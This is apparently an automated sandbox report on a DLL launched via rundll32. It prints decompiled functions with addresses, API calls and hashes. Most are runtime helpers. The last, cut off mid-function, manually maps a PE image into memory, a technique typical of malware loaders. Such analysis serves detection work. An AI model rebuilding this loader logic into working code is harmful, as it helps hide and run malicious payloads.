							_t5 =  *0x6f34619c; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6F31FE28(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6f34619c; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6F3204CA(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6F3201B7(_t43, 1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t54);
											if(__eflags != 0) {
												E6F320E38(_t61, _t54, 0x6f35e640);
												E6F31FEFF(0);
												goto L45;
											} else {
												_t40 = 0;
												E6F3204CA(__eflags,  *0x6f34619c, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6F3204CA(0,  *0x6f34619c, 0);
											_push(0);
											L41:
											E6F31FEFF();
											goto L36;
										}
									}
								} else {
									_t54 = E6F32048B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6f34619c; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6f32103a
0x6f32103a
0x6f321045
0x6f321047
0x6f32104c
0x6f32104f
0x6f32106d
0x6f321070
0x6f321075
0x6f321077
0x00000000
0x6f321079
0x6f321085
0x6f321088
0x6f321089
0x6f32108b
0x6f3210b0
0x6f3210b2
0x6f3210cb
0x6f3210d2
0x6f3210d7
0x00000000
0x6f3210b4
0x6f3210b4
0x6f3210bd
0x6f3210c2
0x00000000
0x6f3210c2
0x6f32108d
0x6f32108d
0x6f32108d
0x6f321096
0x6f32109b
0x6f32109c
0x6f32109c
0x6f3210a1
0x00000000
0x6f3210a1
0x6f32108b
0x6f321051
0x6f321057
0x6f32105b
0x6f321068
0x00000000
0x6f32105d
0x6f321060
0x6f3210da
0x6f3210da
0x6f321062
0x6f321062
0x6f321062
0x6f321064
0x6f321064
0x6f321064
0x6f321060
0x6f32105b
0x6f3210dd
0x6f3210e5
0x6f3210e7
0x6f3210e9
0x6f3210f1
0x6f3210f6
0x6f3210f7
0x6f3210fc
0x6f3210fd
0x6f321100
0x6f32111a
0x6f32111d
0x6f321122
0x6f321124
0x00000000
0x6f321126
0x6f321132
0x6f321135
0x6f321136
0x6f321138
0x6f32115b
0x6f32115d
0x6f321174
0x6f32117b
0x6f321180
0x00000000
0x6f32115f
0x6f321166
0x6f32116b
0x00000000
0x6f32116b
0x6f32113a
0x6f321141
0x6f321146
0x6f321147
0x6f321147
0x6f32114c
0x00000000
0x6f32114c
0x6f321138
0x6f321102
0x6f321108
0x6f32110a
0x6f32110c
0x6f321115
0x00000000
0x6f32110e
0x6f32110e
0x6f321111
0x6f32118b
0x6f32118b
0x6f321190
0x6f321193
0x6f321194
0x6f321195
0x6f32119c
0x6f32119e
0x6f3211a3
0x6f3211a6
0x6f3211c4
0x6f3211c7
0x6f3211cc
0x6f3211ce
0x00000000
0x6f3211d0
0x6f3211dc
0x6f3211e0
0x6f3211e2
0x6f321207
0x6f321209
0x6f321222
0x6f321229
0x00000000
0x6f32120b
0x6f32120b
0x6f321214
0x6f321219
0x00000000
0x6f321219
0x6f3211e4
0x6f3211e4
0x6f3211e4
0x6f3211ed
0x6f3211f2
0x6f3211f3
0x6f3211f3
0x00000000
0x6f3211f8
0x6f3211e2
0x6f3211a8
0x6f3211ae
0x6f3211b0
0x6f3211b2
0x6f3211bf
0x00000000
0x6f3211b4
0x6f3211b4
0x6f3211b7
0x6f321231
0x6f321231
0x6f3211b9
0x6f3211b9
0x6f3211b9
0x6f3211b9
0x6f3211bb
0x6f3211bb
0x6f3211bb
0x6f3211b7
0x6f3211b2
0x6f321234
0x6f32123c
0x6f32123e
0x6f32123e
0x6f321245
0x6f321113
0x6f321183
0x6f321183
0x6f321185
0x00000000
0x6f321187
0x6f32118a
0x6f32118a
0x6f321185
0x6f321111
0x6f32110c
0x6f3210eb
0x6f3210f0
0x6f3210f0

APIs

GetLastError.KERNEL32(?,?,?,6F323575,00000000,00000001,6F32084A,?,6F323A32,00000001,?,?,?,6F3207E3,?,00000000), ref: 6F32103F
_free.LIBCMT ref: 6F32109C
_free.LIBCMT ref: 6F3210D2
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F323A32,00000001,?,?,?,6F3207E3,?,00000000,00000000,6F345098,0000002C,6F32084A), ref: 6F3210DD

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 11d9f9d89cfc8e58ec6352e87de5f7ca4b98f225c2463b654ff8a3486da746a1
Instruction ID: efda33f2bd1a43718351c5f0bc55ccbaaaf504ae581f6340d4c7b026900603f9
Opcode Fuzzy Hash: 11d9f9d89cfc8e58ec6352e87de5f7ca4b98f225c2463b654ff8a3486da746a1
Instruction Fuzzy Hash: 1811E9B2208BC06ADB007B794E90D5B31ED9BC377D720C229F368861C1DF239C1D8960

Uniqueness

Uniqueness Score: -1.00%

Function 6F321191, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6F321191(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				void* _t14;
				signed int _t18;
				long _t21;

				_t14 = __ecx;
				_t21 = GetLastError();
				_t2 =  *0x6f34619c; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3204CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6F3201B7(_t14, 1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6F3204CA(__eflags,  *0x6f34619c, _t18);
							if(__eflags != 0) {
								E6F320E38(_t21, _t18, 0x6f35e640);
								E6F31FEFF(0);
								goto L13;
							} else {
								_t13 = 0;
								E6F3204CA(__eflags,  *0x6f34619c, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6F3204CA(0,  *0x6f34619c, 0);
							_push(0);
							L9:
							E6F31FEFF();
							goto L4;
						}
					}
				} else {
					_t18 = E6F32048B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6f34619c; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6f321191
0x6f32119c
0x6f32119e
0x6f3211a3
0x6f3211a6
0x6f3211c4
0x6f3211c7
0x6f3211cc
0x6f3211ce
0x00000000
0x6f3211d0
0x6f3211dc
0x6f3211e0
0x6f3211e2
0x6f321207
0x6f321209
0x6f321222
0x6f321229
0x00000000
0x6f32120b
0x6f32120b
0x6f321214
0x6f321219
0x00000000
0x6f321219
0x6f3211e4
0x6f3211e4
0x6f3211e4
0x6f3211ed
0x6f3211f2
0x6f3211f3
0x6f3211f3
0x00000000
0x6f3211f8
0x6f3211e2
0x6f3211a8
0x6f3211ae
0x6f3211b2
0x6f3211bf
0x00000000
0x6f3211b4
0x6f3211b7
0x6f321231
0x6f321231
0x6f3211b9
0x6f3211b9
0x6f3211b9
0x6f3211bb
0x6f3211bb
0x6f3211bb
0x6f3211b7
0x6f3211b2
0x6f321234
0x6f32123c
0x6f321245

APIs

GetLastError.KERNEL32(-00000017,6F35E844,00000000,6F3201A9,6F31FEF4,6F35E824,?,6F31C421,00000000,6F35E844,00000000), ref: 6F321196
_free.LIBCMT ref: 6F3211F3
_free.LIBCMT ref: 6F321229
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F31C421,00000000,6F35E844,00000000), ref: 6F321234

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f79d37f7596fa2a7d794c45dcac6261f3838b9d139eb997f76e4795b1eba24b4
Instruction ID: a5bb8919052797971574246731ab0b2c2da94d3433e3f450c76d03bfa1c8204f
Opcode Fuzzy Hash: f79d37f7596fa2a7d794c45dcac6261f3838b9d139eb997f76e4795b1eba24b4
Instruction Fuzzy Hash: 0C112BF2208B002AD7007A785D80D1B32EE9BC37BC7205329F268D65C1DF33AC2D8960

Uniqueness

Uniqueness Score: -1.00%

Function 6F325292, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F325292(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f3468f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F32527B();
					E6F32523D();
					_t13 = WriteConsoleW( *0x6f3468f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6f3252af
0x6f3252b3
0x6f3252c0
0x6f3252c5
0x6f3252e0
0x6f3252e0
0x6f3252e6

APIs

WriteConsoleW.KERNEL32(?,?,6F32084A,00000000,?,?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001), ref: 6F3252A9
GetLastError.KERNEL32(?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001,00000000,00000001,?,6F323A56,6F3207E3), ref: 6F3252B5

Part of subcall function 6F32527B: CloseHandle.KERNEL32(FFFFFFFE,6F3252C5,?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001,00000000,00000001), ref: 6F32528B

___initconout.LIBCMT ref: 6F3252C5

Part of subcall function 6F32523D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F32526C,6F324E04,00000001,?,6F323502,00000000,00000000,00000001,00000000), ref: 6F325250

WriteConsoleW.KERNEL32(?,?,6F32084A,00000000,?,6F324E17,?,00000001,?,00000001,?,6F323502,00000000,00000000,00000001,00000000), ref: 6F3252DA

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 628767785ae872e6f62d1ad2e23b024e4cb363287d4a598d9c8669bdb4b03f31
Instruction ID: f8a3c91d601b10318b55d7b45fe551e5edcaf49c3b994ec4f4a13a697f2532f7
Opcode Fuzzy Hash: 628767785ae872e6f62d1ad2e23b024e4cb363287d4a598d9c8669bdb4b03f31
Instruction Fuzzy Hash: A0F03036044715BBCF522F95CC08E893FAEFF0A3B0B144418FA19951A4DB32D9309BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F322221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6F322221(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				char _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;

				_t79 = __edx;
				_push(_a16);
				_push(_a12);
				E6F32233C(__ebx, __ecx, __edx, __eflags);
				_t39 = E6F321FC6(__eflags, _a4);
				_v16 = _t39;
				_t69 =  *(_a12 + 0x48);
				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t81 = E6F31FEB1(_t69, 0x220);
				_t64 = __ebx | 0xffffffff;
				__eflags = _t81;
				if(__eflags == 0) {
					L5:
					_t86 = _t64;
					goto L6;
				} else {
					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
					 *_t81 =  *_t81 & 0x00000000;
					_t86 = E6F32242D(_t64, _t79, _t81,  *(_a12 + 0x48), __eflags, _v16, _t81);
					__eflags = _t86 - _t64;
					if(__eflags != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E6F321371();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t64 == 1;
						if(_t64 == 1) {
							_t58 = _a12;
							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x6f346268;
							if( *((intOrPtr*)(_t58 + 0x48)) != 0x6f346268) {
								E6F31FEFF( *((intOrPtr*)(_t58 + 0x48)));
							}
						}
						 *_t81 = 1;
						_t76 = _t81;
						_t81 = 0;
						 *(_a12 + 0x48) = _t76;
						_t48 = _a12;
						__eflags =  *(_t48 + 0x350) & 0x00000002;
						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x6f346788 & 0x00000001;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t51 = 5;
								_v16 = _t51;
								_v12 = _t51;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6F321EC2( &_v5, _t79, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6f34625c =  *_a16;
								}
							}
						}
						L6:
						E6F31FEFF(_t81);
						return _t86;
					} else {
						 *((intOrPtr*)(E6F3201A4(__eflags))) = 0x16;
						goto L5;
					}
				}
			}

0x6f322221
0x6f322229
0x6f32222c
0x6f32222f
0x6f322237
0x6f322242
0x6f322245
0x6f32224b
0x00000000
0x6f32224d
0x6f322251
0x6f32225e
0x6f322260
0x6f322264
0x6f322266
0x6f322296
0x6f322296
0x00000000
0x6f322268
0x6f322275
0x6f32227b
0x6f322283
0x6f322287
0x6f322289
0x6f3222a8
0x6f3222ac
0x6f3222ae
0x6f3222ae
0x6f3222b9
0x6f3222bd
0x6f3222be
0x6f3222c0
0x6f3222c3
0x6f3222ca
0x6f3222cf
0x6f3222d4
0x6f3222ca
0x6f3222d5
0x6f3222db
0x6f3222e0
0x6f3222e2
0x6f3222e5
0x6f3222e8
0x6f3222ef
0x6f3222f1
0x6f3222f8
0x6f3222fd
0x6f322308
0x6f32230b
0x6f32230c
0x6f32230f
0x6f322315
0x6f322319
0x6f32231d
0x6f32231e
0x6f322323
0x6f322327
0x6f322332
0x6f322332
0x6f322327
0x6f3222f8
0x6f322298
0x6f322299
0x00000000
0x6f32228b
0x6f322290
0x00000000
0x6f322290
0x6f322289

APIs

Part of subcall function 6F321FC6: GetOEMCP.KERNEL32(00000000,6F32223C,6F323187,00000000,00000000,00000000,00000000,?,6F323187), ref: 6F321FF1

_free.LIBCMT ref: 6F322299
_free.LIBCMT ref: 6F3222CF

Strings

hb4o, xrefs: 6F3222C3

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: hb4o
API String ID: 269201875-4070740096
Opcode ID: 6c65bcc19f0e71bde2baa70522647b6fa37c36fbfbfb3f9076f7b7388118d73c
Instruction ID: e89f1e5dc3a7e036098cc2ea4cb4af4af2a4052eda60648403455d411391a321
Opcode Fuzzy Hash: 6c65bcc19f0e71bde2baa70522647b6fa37c36fbfbfb3f9076f7b7388118d73c
Instruction Fuzzy Hash: D1319071904349AFEB01DF69CD40BDA7BF4EF85324F15015AE9149B291EB33E951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F31CD1E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6F31CD1E(void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t48;
				signed int _t54;

				if( *0x6f35e131 == 0) {
					_t54 = _a4;
					__eflags = _t54;
					if(_t54 == 0) {
						L4:
						_t19 = E6F31D216();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6f34609c; // 0x206de7d6
							_push(_t48);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6f34609c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t54;
							if(_t54 != 0) {
								goto L9;
							} else {
								_t25 = E6F31FB81(_t19, 0x6f35e134);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6F31FB81(_t25, 0x6f35e140);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6f35e131 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t54 - 1;
						if(_t54 != 1) {
							E6F31CEA2(__edx, _t48, _t54, 5);
							asm("int3");
							E6F31D020(__edx, 0x6f344f98, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6f300000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6f30003c; // 0x80
								__eflags =  *((intOrPtr*)(_t31 + 0x6f300000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6f300000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6f300018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6f300018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6F31CBA6(0x6f300000, _a4 - 0x6f300000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6f31cd2b
0x6f31cd32
0x6f31cd35
0x6f31cd37
0x6f31cd3e
0x6f31cd3e
0x6f31cd43
0x6f31cd45
0x6f31cd6d
0x6f31cd6d
0x6f31cd75
0x6f31cd7e
0x6f31cd86
0x6f31cd88
0x6f31cd88
0x6f31cd8e
0x6f31cd91
0x6f31cd94
0x6f31cd97
0x6f31cd98
0x6f31cd99
0x6f31cd9f
0x6f31cda2
0x6f31cda8
0x6f31cdab
0x6f31cdac
0x6f31cdad
0x00000000
0x6f31cd47
0x6f31cd47
0x6f31cd49
0x00000000
0x6f31cd4b
0x6f31cd50
0x6f31cd56
0x6f31cd58
0x6f31cd69
0x6f31cd69
0x6f31cd5a
0x6f31cd5f
0x6f31cd65
0x6f31cd67
0x6f31cdaf
0x6f31cdaf
0x6f31cdb6
0x00000000
0x00000000
0x00000000
0x6f31cd67
0x6f31cd58
0x6f31cd49
0x6f31cdba
0x6f31cd39
0x6f31cd39
0x6f31cd3c
0x6f31cdbd
0x6f31cdc2
0x6f31cdca
0x6f31cdcf
0x6f31cdd8
0x6f31cddf
0x6f31ce3e
0x6f31ce3e
0x6f31ce45
0x6f31ce45
0x6f31cde1
0x6f31cde1
0x6f31cde6
0x6f31cdf0
0x00000000
0x6f31cdf2
0x6f31cdf7
0x6f31cdfe
0x00000000
0x6f31ce00
0x6f31ce0c
0x6f31ce13
0x6f31ce15
0x00000000
0x6f31ce17
0x6f31ce17
0x6f31ce1b
0x00000000
0x6f31ce1d
0x6f31ce1d
0x6f31ce24
0x6f31ce24
0x6f31ce1b
0x6f31ce15
0x6f31cdfe
0x6f31cdf0
0x6f31ce4a
0x6f31ce56
0x00000000
0x00000000
0x00000000
0x6f31cd3c
0x6f31cd2d
0x6f31cd30
0x6f31cd30

Strings

45o, xrefs: 6F31CD79
@5o, xrefs: 6F31CD9A

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 45o$@5o
API String ID: 0-1093020409
Opcode ID: f884baecd7498c06d9227a2d3a50284cbb9c4b768b4d84896167e4b170b1bb47
Instruction ID: 3655afbe8d8b6137f970e72c556a6852bdb8f4494982388d305c4f3cf7c3c208
Opcode Fuzzy Hash: f884baecd7498c06d9227a2d3a50284cbb9c4b768b4d84896167e4b170b1bb47
Instruction Fuzzy Hash: 9211C6B6E097186BCF18DE78C4417CE7BA98F46364F00416ADC50EB2C0D672E6858BB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 580 Parent PID: 4716 rundll32.exeCOMMON

Executed Functions

Function 6F31BB30, Relevance: 14.0, APIs: 9, Instructions: 493
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6F31BB30(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				long _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				long _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				signed int _t198;
				void* _t209;
				long _t212;
				intOrPtr _t221;
				void* _t231;
				void _t235;
				void* _t237;
				signed int _t239;
				long _t240;
				signed int _t242;
				void* _t244;
				intOrPtr _t245;
				long _t248;
				intOrPtr* _t253;
				signed int* _t255;
				signed int* _t258;
				void* _t263;
				signed int _t264;
				signed int _t265;
				signed char _t266;
				intOrPtr _t267;
				signed int _t270;
				void* _t279;
				void* _t288;
				void* _t293;
				intOrPtr _t294;
				signed int _t297;
				void _t298;
				intOrPtr _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				long _t306;
				signed char _t307;
				signed int _t308;
				intOrPtr _t312;
				void _t314;
				signed int _t318;
				signed int _t319;
				void _t321;
				intOrPtr _t329;
				intOrPtr _t333;
				void* _t336;
				signed int* _t339;
				void* _t341;
				signed int _t343;
				intOrPtr _t345;
				intOrPtr _t346;
				void _t348;
				signed int _t353;
				signed short* _t354;
				void* _t355;
				signed int _t358;
				long _t361;
				void* _t362;
				intOrPtr _t367;
				intOrPtr _t368;
				long _t369;
				long _t371;
				signed int _t375;
				void* _t376;
				long _t379;
				intOrPtr _t380;
				intOrPtr* _t384;
				signed int _t388;
				void* _t390;
				intOrPtr _t392;
				long _t394;
				intOrPtr _t395;
				signed int _t396;
				void* _t397;
				void* _t398;

				_t198 =  *0x6f34609c; // 0xdcaf13c8
				_v8 = _t198 ^ _t396;
				_t339 = __ecx;
				_push(__esi);
				_t371 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				_push(__edi);
				if(__edx < 0x40) {
					L3:
					_push(0xd);
					goto L88;
				} else {
					if( *__ecx != 0x5a4d) {
						L87:
						_push(0xc1);
						goto L88;
					} else {
						_t4 = _t339 + 0x3c; // 0xcccccccc
						_t306 =  *_t4;
						_v72 = _t306;
						_t6 = _t306 + 0xf8; // 0xcccccdc4
						if(__edx >= _t6) {
							_t297 = _t306 + __ecx;
							_v68 = _t297;
							if( *(_t306 + __ecx) != 0x4550 ||  *((intOrPtr*)(_t297 + 4)) != 0x14c) {
								goto L87;
							} else {
								_t307 =  *(_t297 + 0x38);
								if((_t307 & 0x00000001) != 0) {
									goto L87;
								} else {
									_t358 =  *(_t297 + 6) & 0x0000ffff;
									_t341 = ( *(_t297 + 0x14) & 0x0000ffff) + 0x24;
									if(_t358 != 0) {
										_t355 = _t341 + _t297;
										do {
											_t294 =  *((intOrPtr*)(_t355 + 4));
											_t355 = _t355 + 0x28;
											_t335 =  !=  ? _t294 : _t307;
											_t336 = ( !=  ? _t294 : _t307) +  *((intOrPtr*)(_t355 - 0x28));
											_t337 =  <=  ? _t371 : _t336;
											_t371 =  <=  ? _t371 : _t336;
											_t307 =  *(_t297 + 0x38);
											_t358 = _t358 - 1;
										} while (_t358 != 0);
									}
									__imp__GetNativeSystemInfo( &_v44); // executed
									_t308 = _v40;
									_t343 =  !(_t308 - 1);
									_t361 = _t308 - 0x00000001 +  *((intOrPtr*)(_t297 + 0x50)) & _t343;
									if(_t361 != (_t308 - 0x00000001 + _t371 & _t343)) {
										goto L87;
									} else {
										_t209 = VirtualAlloc( *(_t297 + 0x34), _t361, 0x3000, 4); // executed
										_v60 = _t209;
										if(_t209 != 0) {
											L13:
											_v100 = GetProcessHeap;
											_t212 = HeapAlloc(GetProcessHeap(), 8, 0x44);
											_t362 = _t212;
											_v76 = _t362;
											if(_t362 != 0) {
												 *((intOrPtr*)(_t362 + 4)) = _v60;
												 *((intOrPtr*)(_t362 + 0x1c)) = E6F31BA90;
												 *(_t362 + 0x14) = ( *(_t297 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
												 *((intOrPtr*)(_t362 + 0x20)) = E6F31BAB0;
												 *((intOrPtr*)(_t362 + 0x24)) = E6F31BAD0;
												 *((intOrPtr*)(_t362 + 0x28)) = E6F31BAE0;
												 *((intOrPtr*)(_t362 + 0x2c)) = E6F31BB00;
												 *(_t362 + 0x34) = 0;
												 *(_t362 + 0x40) = _v40;
												if(E6F31B840(_v56,  *(_t297 + 0x54)) == 0) {
													L33:
													E6F31E93F( *((intOrPtr*)(_t362 + 0x30)));
													_t220 =  *((intOrPtr*)(_t362 + 8));
													_t398 = _t397 + 4;
													if( *((intOrPtr*)(_t362 + 8)) != 0) {
														_t375 = 0;
														if( *((intOrPtr*)(_t362 + 0xc)) > 0) {
															do {
																_t220 =  *((intOrPtr*)(_t362 + 8));
																_t312 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 8)) + _t375 * 4));
																if(_t312 != 0) {
																	 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x2c))))(_t312,  *(_t362 + 0x34));
																	_t220 =  *((intOrPtr*)(_t362 + 8));
																	_t398 = _t398 + 8;
																}
																_t375 = _t375 + 1;
															} while (_t375 <  *((intOrPtr*)(_t362 + 0xc)));
